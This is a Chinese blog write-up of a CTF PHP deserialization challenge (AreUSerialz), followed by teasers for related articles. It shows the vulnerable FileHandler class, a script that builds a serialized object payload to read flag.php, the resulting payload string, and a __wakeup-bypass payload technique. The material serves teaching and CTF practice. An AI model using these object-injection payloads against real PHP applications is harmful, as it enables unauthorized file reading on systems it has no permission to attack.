PHP反序列化漏洞解析

最新推荐文章于 2024-09-27 15:03:17 发布
最新推荐文章于 2024-09-27 15:03:17 发布
阅读量781 收藏 2
点赞数
分类专栏: CTF刷题 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43749601/article/details/109406794
版权
本文探讨了PHP中利用unserialize函数进行反序列化攻击的解题思路,涉及构造恶意序列化字符串、属性权限理解、魔术方法和绕过_wakeup方法技巧。通过实例分析,揭示了如何控制对象行为获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

解题思路

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;   //%00*%00属性名
    protected $filename;
    protected $content;

    function __construct() { //该方法在创建对象时自动调用
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {  //如果op=1调用write函数,若op=2,调用read函数,否则输出Bad Hacker!
        if($this->op == "1") {  
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() { //该方法在销毁对象时使用,会调用两次,一次是实例化之后的对象,一次是反序列化后生成的对象
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}   

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}//传入一个str,然后利用is_valid函数判断输入的字符串ascii数值是否在32到125之间,接着对输入的字符串进行反序列化

分析一下源代码,看到了有unserialize()函数,这道题坑定是PHP反序列化无疑了。

首先从程序的入口来看:

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

GET方式传入一个str,然后利用is_valid函数判断输入的字符串ascii数值是否在32到125之间,接着对输入的字符串进行反序列化。(对于PHP反序列化不懂的同学可以先看一下文末)

function __destruct() { 
    if($this->op === "2")
        $this->op = "1";
    $this->content = "";
    $this->process();
}

这里是对op进行判断,如果op=2那么将op改为1,否则执行process方法。

public function process() {  
    if($this->op == "1") {  
        $this->write();
    } else if($this->op == "2") {
        $res = $this->read();
        $this->output($res);
    } else {
        $this->output("Bad Hacker!");
    }
}

process方法在op等于2时,读取filename文件的内容并输出。这里还考察了=====的区别,一个是强类型比较,一个是弱类型比较。我们可以令op=2,这里的2是整数int类型,op=2时,op==="2"为false,op=="2"为true

接着可以写一个对象构造序列化,然后传入str,就可以得到flag了

<?php
 
class FileHandler {
 
    public $op = 2;
    public  $filename = "flag.php";
    public  $content = "oavinci";
}
 
$a = new FileHandler();
$b = serialize($a);
echo $b;

O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";s:7:"content";s:7:"oavinci";}

在这里插入图片描述

PHP反序列化原理

当传给 unserialize() 的参数可控时,我们可以通过传入一个精心构造的序列化字符串,从而控制对象内部的变量甚至是函数。

序列化:

PHP 的序列化是一个将各种类型的数据,压缩并按照一定格式存储的过程,它所使用的函数是serialize()

<?php

class FileHandler {

    public $ab=2;  
    public $cd="flag.php";
    public $efg="hello";
}

$a=new FileHandler();
$b=serialize($a);
echo $b;

序列化后的输出如下:

O:11:"FileHandler":3:{s:2:"ab";i:2;s:2:"cd";s:8:"flag.php";s:3:"efg";s:5:"hello";}

反序列化

反序列化就是将压缩格式化的字符串还原。

魔术方法

接着了解一下PHP里边的几个魔术方法

(1)construct():当对象创建时会自动调用(但在unserialize()时是不会自动调用的)(2)wakeup()unserialize()时会自动调用
(3)destruct():当对象被销毁时会自动调用。会调用两次,一次是实例化之后的对象,一次是反序列化后生成的对象
(4)toString():当反序列化后的对象被输出在模板中的时候(转换成字符串的时候)自动调用
(5)get() :当从不可访问的属性读取数据
(6)call(): 在对象上下文中调用不可访问的方法时触发
(7)sleep():serialize()之前自动调用

属性的权限

这里有个很重要的知识点:

<?php
 
class FileHandler {
 
    public $op = 2;
    private  $oa = "123";
    protected  $ob = "456";
}
 
$a = new FileHandler();
$b = serialize($a);
echo $b;

序列化后的结果如下:

O:11:"FileHandler":3:{s:2:"op";i:2;s:15:"FileHandleroa";s:3:"123";s:5:"*ob";s:3:"456";}

我们会发现里边的属性名明明是oa 但序列化后的结果却是FileHandleroa,并且他的长度明明是13,但序列化后的结果却是15;属性名明明是ob,但学历恶化厚的结果却是*ob,长度也变成了5。

这里就涉及到PHP的属性访问权限了,序列化为了能把整个类对象的各种信息完完整整的压缩,格式化,必然也会将属性的权限序列化进去,我们发现我定义的类的属性有三种 private protected 和 默认的 public(写不写都一样)

  • Puiblic 权限

他的序列化规规矩矩,按照我们常规的思路,该是几个字符就是几个字符。

  • Private 权限

该权限是私有权限,也就是说只能 FileHandler类使用,于是在序列化的时候一定要在 private 属性前面加上自己的名字,向世界表明这个属性是我独自占有的,但是好像长度还是不对,还少了两个,这是因为private权限的属性在序列话的时候会在属性名的前面加上类的名字,并在类的前后加上两个空白符,就是这样:%00类名%00属性名

  • Protected 权限

Protected 权限序列化后的格式是:%00*%00属性名

绕过_wakeup魔术方法

当序列化字符串中,表示对象属性个数的值大于实际属性个数时,那么就会跳过wakeup方法的执行。比如有个Student类,里面有个参数为name。
实际情况:O:7:”Student”:1:{S:4:”name”;s:8:”zhangsan”;}
Payload:O:7:”Student”:2:{S:4:”name”;s:8:”zhangsan”;}
Payload对象属性个数为2,而实际属性个数为1,那么就会掉入漏洞,从而跳过wakeup()方法。

【网络安全】反序列化漏洞详细解析
你在看屏幕的同时,屏幕也在注视着你
09-30 3135
反序列化漏洞详细解析
[CTF]CTFSHOW反序列化
Sapphire037的博客
01-20 4029
265 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-04 23:52:24 # @Last Modified by: h1xa # @Last Modified time: 2020-12-05 00:17:08 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); include('flag.php');
PHP反序列化漏洞总结
未完成的歌~的博客
02-22 4357
程序未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,通过在参数中注入一些代码,从而达到代码执行,SQL 注入,目录遍历等不可控后果,危害较大。
PHP反序列化漏洞
kuiguowei的博客
01-16 1021
php反序列化漏洞又称为php对象注入,是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险。为了理解这个漏洞,请读者具备基础的php知识。类和变量是非常容易理解的php概念。举个例子,1.php在一个类中定义了一个变量和一个方法。它创建了一个对象并且调用了PrintVariable函数,该函数会输出变量variable。       class TestClass
ctf php 读取flag,BugkuCTF flag.php(反序列化)
weixin_36098968的博客
04-01 1855
进去后是个登录页面,但是login根本不会跳转,看源码也没提示,但是这道题给了一个提示:hint,那么盲猜应该是一个get参数,因为post不能跳转,那么get总有内容吧,跟上hint参数,随便赋一个值。 发现报出了源码审计一波发现只要cookie的值等于$key变量的序列化字符就能输出flag。那么发现之前没有给$key定义赋值,但是最下面出现了,我们先在本机上查看这种情况下的$key变量的序...
php反序列化
n1ght的博客
11-30 880
php反序列化,和php的session反序列化php原生类
AreUSerialz-[网鼎杯 2020 青龙组]-[传送门->BUUCTF]
qwsn
11-23 1757
0x01、Web 1.AreUSerialz-[网鼎杯 2020 青龙组]-[传送门->BUUCTF] 第一步:打开题目环境,进行代码审计 <?php include("flag.php"); //文件包含flag.php highlight_file(__FILE__); //高亮显示当前页面源码 class FileHandler { //类:FileHandler protected $op; //保护属性:$op protected $
备战CTF做题题解
weixin_40707492的博客
07-21 6960
备战CTF初期,没有什么经验,部分操作过程有借鉴大佬
buuctf刷题
qq_41788704的博客
10-28 2158
buuctf刷题BJDCTF2020 Easy MD5网鼎杯 2020 青龙组 AreUSerialzGYCTF2020 Blacklist强网杯 2019 随便注 BJDCTF2020 Easy MD5 进来就是一个输入框,发包查看返回信息 可以看到SQL语句。这里猜想MD5出来的值会不会可以可以这样利用 select * from ‘admin’ where password=’‘or’1’ 这段PHP代码可以找到MD5出来的值类似于 '‘or’1…’ <?php for ($i = 0;;)
php反序列化漏洞漏洞原理,如何防御此漏洞?如何利用此漏洞
Hacker_gangg的博客
08-09 800
原理:PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通。防御:1)签名与认证。
PHP反序列化漏洞-从入门到提升
AkangBoy的博客
11-09 1842
本文从PHP序列化原理讲起,逐渐深入到PHP反序列化及其漏洞,几乎每个知识点都配有代码演示,十分方便理解,希望对你们有所帮助!
PHP反序列化漏洞初窥1
08-03
### PHP反序列化漏洞解析 #### 一、序列化与反序列化概念 在深入探讨PHP反序列化漏洞之前,我们需要先理解序列化与反序列化的概念及其在PHP中的实现方式。 - **序列化**: 是一种将数据结构或对象状态转换成一系列...
Fastjson反序列化漏洞原理与漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 5551
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞的原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
CTFshow——web入门——php特性(上篇)
h_adam的博客
11-16 4603
web入门——php特性web89web90web91web92 web89 题目 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $fl
CTFshow_反序列化_web276
ScyLamb的博客
04-28 909
web276 phar反序列化 对phar的利用当时学的时候是半知半解,导致写这题花了好久,又无wp,最后然后尝试用单步调试解决了 <?php highlight_file(__FILE__); class filter{ public $filename; public $filecontent; public $evilfile=false; public $admin = false; public function __construct($f,$f
【BUUCTF】AreUSerialz (反序列化
徐徐徐的博客
09-04 895
当遇到不可打印字符被过滤时,有两种方法:PHP版本>=7.2时,可将protected直接修改为public将序列化后的字符串中的%00修改为\00,并将保护类型为protected的变量的变量类型由s改为S。
代码审计:[网鼎杯 2020 青龙组]AreUSerialz
fightte的博客
05-18 166
更长: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content
PHP反序列化3(属性绕过)
最新发布
2302_81328699的博客
09-27 589
【代码】PHP反序列化3(属性绕过)
ctfshow-php特性-超详解(干货)
qq_50589021的博客
08-05 9041
PHP特性 web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } ?> intval函数(获
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值